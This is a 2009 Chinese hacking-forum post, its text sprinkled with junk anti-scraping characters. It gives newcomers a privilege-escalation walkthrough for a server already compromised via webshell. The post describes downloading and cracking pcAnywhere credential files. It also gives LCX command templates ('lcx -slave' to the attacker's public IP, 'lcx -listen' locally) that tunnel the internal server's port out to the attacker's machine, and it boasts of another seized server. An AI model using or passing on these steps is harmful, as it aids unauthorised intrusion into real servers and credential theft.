|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
6 L. C: Z, m X9 c6 U" N
( ], H5 l$ G0 \* O8 ~提权方法:pcanywhere+LCX& D6 g m" B0 u0 W
' T6 D% f+ s4 V& q! v% t
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。- k2 Y, T$ T- |$ x/ M
6 o$ w# e3 K: O; `) S6 E& X. |' {在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。6 x2 D: n( E% E) |, U/ n% ?
& V! I0 w7 b/ ~
8 W$ [" X5 [8 X; Q4 f6 [* p# }查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
, O4 L" d$ c7 J1 \ ?
* K3 u5 p/ [" f: c8 R. w1 X7 m9 T+ f! r- L2 _3 c
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
1 q7 M% V, F! N* P3 C
( \$ f: r+ U$ W: T1 ?
" J& L4 r0 v. i, u
' Q' B* Z9 q( z+ C9 {5 M" r" {5 B$ y
5 X0 r7 P- G& ]5 v; U由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
, r9 ^$ @/ V. _6 ~
O9 e( r* h5 E9 N4 C& \* G0 }- _/ v9 s; n h7 _' {
LCX的用法再简单说下:
/ E% S! [2 f& B" Q/ K0 N9 }! u9 D2 f% V7 v/ f& f1 H
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
' E, g- \' \9 n, O) h8 {: R+ ]# B( d2 H9 a7 D3 v6 |) V9 i
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)9 G/ y+ N/ {' U" k0 x
* m4 c/ I1 o C* O7 |* R( O( r8 f由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。/ t2 `0 i4 m: l3 M( ?
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``3 o: G1 d; N6 d: z6 c4 _8 o
0 z1 Z0 @7 K& F; M$ W& B& r5 p; w' I
7 X7 Z* L7 X/ u
% x9 C0 s$ l& p2 j' u+ T, U! h" ?( b呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。7 P( K& b3 E, g0 i% g3 z4 ^
0 S# Y! z$ D1 v$ i
& l% @. Y' M; n' j, D- Y
, X, n; ?$ q' @5 s
6 x3 O0 o$ Y$ d' k& R" M2 W我们本地连接试试,输入我们刚破解的账号密码
( Y: b+ u0 k! C8 h
+ U$ n' c+ K& U. C* E2 b) x l
# \8 r2 d. O) b m( a, r呵呵``连接成功,服务器不错,又一个8核^︵^- W4 ]) f! T0 z) F1 [: `+ i! q
- i' f2 Z! t' J" K9 k, @
3 O1 l1 ]- F) E' q; }- [; Z' y' w
( D2 q, K$ M3 M( e1 W |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
